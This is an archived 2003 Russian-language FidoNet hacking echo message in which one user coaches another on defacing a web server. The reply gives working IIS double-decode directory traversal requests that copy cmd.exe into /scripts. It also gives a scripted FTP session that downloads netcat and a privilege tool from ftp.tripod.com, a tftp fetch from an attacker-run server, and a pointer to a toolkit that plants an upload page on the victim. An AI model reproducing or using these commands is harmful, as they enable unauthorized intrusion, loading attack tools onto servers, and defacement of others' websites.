|
ru.nethack
- RU.NETHACK -------------------------------------------------------------------
From : Fedor Kudryashev 2:5020/4001.72 09 Mar 2003 15:54:44
To : Slavik Levchenko
Subject : deface's
--------------------------------------------------------------------------------
09 Mar 03 11:26, you wrote to all:
sl> народ, я вот вчера про%бался с одним хостом так и не задефейсив его
sl> :((
sl> cmd.exe получил, mycmd.exe тоже.
Получил tftp.exe или ftp.exe ?
Иначе - поищи unitools.tar.gz (если мне память не глючит)
Там есть перловник, который создаёт на жертве ASP страничку (upload.asp), на
которую заходишь и заливаешь как крутой - любой файл через веб-интерфейс.
sl> cmd.exe?/c+echo+"defaced by..."+>>+c:\inetpub\wwwroot\default.htm
sl> и т.п не работает....
так cmd.exe надо скопировать непосредственно в scripts/
(и кавычки после echo нафиг не нужны в общем случае)
sl> насчет copy:
sl> cmd.exe?/c+copy+www.xxx.yyy/somefile.htm+c:\inetpub\wwwroot\default.ht
Мдя...
/scripts/..%255c../winnt/system32/tftp.exe?-i+_yourtftp_+get+file.ext
(предварительно нужно найти или поставить где-нибудь(например у себя) tftpsever.
(например скачать и запустить tftpd32.exe) и объяснить ему из какой папки можно
отдавать файлы приходящим клиентам.)
Иначе:
/scripts/..%255c../winnt/system32/cmd.exe?/c+copy+\winnt\system32\cmd.exe
/scripts/cmd.exe?/c+echo+user>cmds
/scripts/cmd.exe?/c+echo+pass>>cmds
/scripts/cmd.exe?/c+echo+binary>>cmds
/scripts/cmd.exe?/c+echo+get+nc.exe>>cmds
/scripts/cmd.exe?/c+echo+get+ERunAs2X.exe>>cmds
/scripts/cmd.exe?/c+echo+quit>>cmds
/scripts/..%255c../winnt/system32/ftp.exe?-s:cmds+ftp.tripod.com
(юзверя предварительно регистришь на tripod.com, заливаешь туда нужное файло)
Еще вопросы есть?
В мыло.
Fedor
--- GoldEd d2.50+
* Origin: -= MIPT Station =- (2:5020/4001.72)
Вернуться к списку тем, сортированных по: возрастание даты уменьшение даты тема автор
| Тема: |
Автор: |
Дата: |
|
deface\'s |
slavik levchenko |
09 Mar 2003 12:26:37 |
 deface\'s |
Fedor Kudryashev |
09 Mar 2003 15:54:44 |
 deface\'s |
Ѓ® «мл© ‚Ґав «Ґв |
09 Mar 2003 14:22:46 |
|
|
